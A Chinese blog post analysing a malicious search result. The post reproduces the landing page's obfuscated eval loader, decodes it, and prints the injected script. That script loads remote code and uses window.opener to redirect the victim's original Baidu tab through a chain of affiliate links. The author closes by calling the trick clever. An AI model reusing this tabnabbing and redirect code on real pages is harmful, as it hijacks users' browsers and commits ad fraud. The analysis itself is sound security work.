今天黑五看中了一个汉密尔顿,想百度搜下有没有相关的评析.
https://www.baidu.com/s?ie=UTF-8&wd=H18516731
然后发现了搜索排名第一的家伙,没想到竟然是一个流氓链接~
点击后发现链接经过了好几个跳转,这不算啥突然我发现我的百度搜索页也经过了好几次跳转!!!
因为经过360搜索的那次风波百度所有的搜索页的链接都是加密过的,不是直接打开的用户链接.没想到这种情况下流氓竟然还能控制父级窗口.所以我就分析了下他的实现机制,在他着陆页面我看到了下面的源代码.
<script language="javascript" type="text/javascript" src="http://js.users.51.la/17745757.js"></script>
<script>
eval(function(d,e,a,c,b,f){b=function(a){return(a<e?"":b(parseInt(a/e)))+(35<(a%=e)?String.fromCharCode(a+29):a.toString(36))};if(!"".replace(/^/,String)){for(;a--;)f[b(a)]=c[a]||b(a);c=[function(a){return f[a]}];b=function(){return"\\w+"};a=1}for(;a--;)c[a]&&(d=d.replace(new RegExp("\\b"+b(a)+"\\b","g"),c[a]));return d}('n(h(d,f,a,c,b,e){b=h(a){i a.p(f)};q(!"".j(/^/,o)){l(;a--;)e[b(a)]=c[a]||b(a);c=[h(a){i e[a]}];b=h(){i"\\\\w+"};a=1}l(;a--;)c[a]&&(d=d.j(r m("\\\\b"+b(a)+"\\\\b","g"),c[a]));i d}(\'(7(){4 a=1.6("2");a.c="//3.5.8/3.9";4 b=1.d("2")[0];b.e.f(a,b)})();\',k,k," s t u v x y h z A B C D E".F(" "),0,{}));',
42,42," function return replace 16 for RegExp eval String toString if new document script cn var tongjii createElement us js src getElementsByTagName parentNode insertBefore split".split(" "),0,{}));
</script>
本以为实现是第一个js文件,后来经过测试发现和一个script标签没关系,所是实现代码是第二个script标签,解密了下代码如下.
(function() {
var a = document.createElement("script");
a.src = "//cn.tongjii.us/cn.js";
var b = document.getElementsByTagName("script")[0];
b.parentNode.insertBefore(a, b)
})();
看来这个载入的js就是源头了,打开这个js发现下面代码.
if(typeof(sbj_new_loading)=="undefined"||sbj_new_loading==null||sbj_new_loading==false){
sbj_new_loading = true;
var seed = document.getElementById('tongjiTool');
if(seed!=null&&seed.src!=null){
seed.src = '';
document.body.removeChild(seed);
}
var _ua = navigator.userAgent.toLowerCase();
var isIE6 = /msie 6/.test(_ua);
if(!isIE6){
scope = {
$pageid : 'tongjiTool'
};
$_GLOBAL = {};
var js = document.createElement('script');
js.src = 'http://cdn.lib.shaibaoj.com/js/lib/jquery.js?5';
js.setAttribute('charset','utf-8');
if (typeof jQuery == 'undefined') {
(document.getElementsByTagName("head")[0] || document.body).appendChild(js);
js.onload = js.onreadystatechange = function () {
if (js && js.readyState && js.readyState != "loaded" && js.readyState != "complete") {
return;
}
//jQuery.noConflict();
jQuery.getJSON("http://qun12.shellgl.in/cookie.jsp?name=ad_tiao×=1&save=1&jsoncallback=?", {},function(datalog){
var tiao_url="http://www.xxxx.com/hd/2015/1111/index.html";
tiao_url="http://www.xxxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.jd.com";
window.location.href = "http://www.xxxx.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
});
if (parent.window.opener) {
var tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.jd.com";
parent.window.opener.location = "http://www.xxxx.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
setTimeout(function(){
tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.mogujie.com";
parent.window.opener.location = "http://www.xxx.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
}, 1000);
setTimeout(function(){
tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.suning.com";
parent.window.opener.location = "http://www.xxxxx.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
}, 2000);
setTimeout(function(){
tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.vip.com";
parent.window.opener.location = "http://www.qqgou.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
}, 3000);
setTimeout(function(){
tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.gome.com.cn";
parent.window.opener.location = "http://www.xxxx.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
}, 4000);
setTimeout(function(){
tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.yhd.com";
parent.window.opener.location = "http://www.qqgou.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
}, 5000);
setTimeout(function(){
tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.nuomi.com";
parent.window.opener.location = "http://www.qqgou.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
}, 6000);
setTimeout(function(){
tiao_url="http://www.xxxx.com/common/url.do?action=redirect&target=http%3A%2F%2Fwww.jumei.com";
parent.window.opener.location = "http://www.qqgou.in/redirect.jsp?target="+encodeURIComponent(tiao_url)+"&keyName=";
}, 7000);
}
};
}
};
}
//
//if (typeof(to_url) != "undefined" && to_url != null && to_url != '' && to_url != 'null') {
// var referer = document.referrer;
// window.location.href = "http://www.qqgou.in/pd.jsp?referer=" + encodeURIComponent(referer)+"&toUrl="+encodeURIComponent(to_url)+"&keyName="+keyStr;
//} else {
// if (typeof(keyStr) != "undefined" && keyStr != null && keyStr != '' && keyStr != 'null') {
// if(typeof(goods_url)!="undefined"&&goods_url!=null&&goods_url!=''&&goods_url!='null'){
// /*
// var referer = document.referrer;
// var bot = ['.haosou.com','.sm.cn','.sina.com.cn','.baidu.com', '.so.com','.soso.com', '.sogou.com','.google.com.hk','so.360.cn', 'cn.bing.com', 'youdao.com','wo.com.cn'];
// for (var i in bot) {
// if(referer!=null&&referer.indexOf(bot[i]) != -1) {
// window.location.href = "http://www.cjjzmx.com/cn_goods_redirect.jsp?referer=&target="+goods_url+"&keyName="+keyStr;
// return;
// }
// }
// window.location.href = "http://www.xxxx.in/pd.jsp?referer=" + encodeURIComponent(referer)+"&keyName="+keyStr;*/
// window.location.href = "http://www.xxxx.in/cn_goods_redirect.jsp?referer=&target="+goods_url+"&keyName="+keyStr;
// }else{
// var referer = document.referrer;
// window.location.href = "http://www.xxx.in/pd.jsp?referer=" + encodeURIComponent(referer)+"&keyName="+keyStr;
// }
// }else{
// var referer = document.referrer;
// window.location.href = "http://www.xxx.in/pd.jsp?referer=" + encodeURIComponent(referer);
// }
//}
看来是parent.window.opener的获取了百度搜索页面,就是没想到这个parent.window.opener在跳转之后还能保持,然后这哥们给了七次链接跳转,看样子应该是刷广告的主了~
不过这思路确实很不错啊!